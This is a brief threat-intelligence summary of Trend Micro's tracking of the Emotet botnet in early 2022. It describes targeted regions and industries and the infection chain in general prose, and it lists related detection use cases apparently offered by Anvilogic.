Recap of Emotet Botnet in 2022

Industries: Education, Government, Healthcare, Manufacturing, Real Estate, Technology, Transportation | Level: Tactical | Source: Trend Micro

Trend Micro's tracking of Emotet malware through the first quarter of 2022, identified the threat as predominantly impacting victims in Japan, countries following include those in APAC and EMEA. From an industry vertical perspective, known organizations most impacted include those in manufacturing, education, government, healthcare, transportation, real estate, technology, and retail. Distribution of Emotet has largely been through spam campaigns and lately has utilized Excel 4.0. Activity that typically follows is the utilization of a BAT or VBScript file to download additional payloads. Regsvr32 is used to execute the downloaded payloads. An alternate infection chain has discovered the use of LNK files to initiate PowerShell commands for the payload's execution. Persistence for Emotet is usually set up with a new service created on the host and/or the creation of an autorun registry key. Various modules can be used by the attacker's command and control to control the malware to update, steal credentials and propagate through the victim's network.

Anvilogic Scenario:

• Emotet Behaviors

Anvilogic Use Cases:

• Malicious Document Execution
• Executable Create Script Process
• Powershell DLL/EXE
• Regsvr32 Execution
• Suspicious File written to Disk
• Windows Service Created